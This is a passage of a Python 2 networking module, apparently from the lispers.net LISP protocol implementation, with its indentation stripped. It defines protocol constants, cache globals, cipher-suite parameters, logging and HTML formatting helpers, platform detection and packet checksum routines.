lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. The key is
# the hostname sent in an Info-Request; the value is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
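#
# For illustration only (hostname, address, and port are hypothetical), state
# learned from an Info-Request might be stored as:
#
# >>> lisp_nat_state_info["xtr-1"] = [<nat-state for 192.0.2.1:16000>, ...]
#
# where each element records a translated RLOC and translated port for that
# hostname. See lisp_store_nat_info() for the exact element format.
#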
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by the user, we don't rate-limit for
# 1 minute so we can load up the cache more quickly.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store the last LISP_FLOW_LOG_SIZE flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
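#
# For illustration only, a hypothetical configured entry could be the prefix
# fd00::/16; as noted above, the prefix length must fall on a 4-bit boundary.
#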
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is indexed by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID-target they are requesting. The key is the EID-prefix in string format
# with the bracketed instance-ID included, in slash format. The value of the
# dictionary array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
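#
# For illustration only (EID-prefix and ITR address are hypothetical), an
# entry might look like:
#
# >>> lisp_pubsub_cache["[1000]10.1.0.0/16"] = { "192.0.2.1" : <state> }
#
# where <state> is the subscription state kept for that requesting ITR.
#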
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix]" is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends are looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to store NAT-translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane(), it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If a keyword is not in the dictionary array, the value is
# wildcarded. The eid-prefix, group-prefix, and rloc-prefix values are
# lisp_address() instances so longest-match lookups can be performed. The
# instance-id value is an array of 2 elements that stores the same value in
# both elements if not a range, or the low and high values of the range.
#
lisp_glean_mappings = []
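#
# For illustration only (all values are hypothetical), one element of the
# array might look like:
#
# >>> { "eid-prefix" : <lisp_address for 10.1.0.0/16>,
# ...   "rloc-prefix" : <lisp_address for 192.0.2.0/24>,
# ...   "instance-id" : [1000, 1000] }
#
# The missing "group-prefix" keyword means the group is wildcarded, and the
# instance-id array [1000, 1000] matches only instance-ID 1000.
#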
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) entries the
# gleaned EID has joined. This data structure is used to time out entries that
# have stopped joining, in which case the RLE is removed from the (S,G) or
# (*,G) whose join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictionary array indexed by group address string. The value of the nested
# dictionary array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this system is running Linux (e.g., Ubuntu or Fedora).
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if the logfile exists. If not, either it is startup time and
# we need to create one, or another procedure rotated the file out of the
# directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do an lprint() even when debug logging is off, by supplying the "force"
# flag so the message is still printed.
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Helps find the location of temporary "printf" code so
# it can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select a random UDP port for use as the source port in a Map-Request and
# the destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
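#
# For example (values chosen for illustration):
#
# >>> lisp_hex_string(31)
# '1f'
# >>> lisp_hex_string(0xdfdf)
# 'dfdf'
#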
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
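#
# For example (addresses chosen for illustration):
#
# >>> lisp_convert_6to4("::ffff:10.1.1.1")
# '10.1.1.1'
# >>> lisp_convert_6to4("2001:db8::1")
# '2001:db8::1'
#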
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too-Big message. It statically
# checksums 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
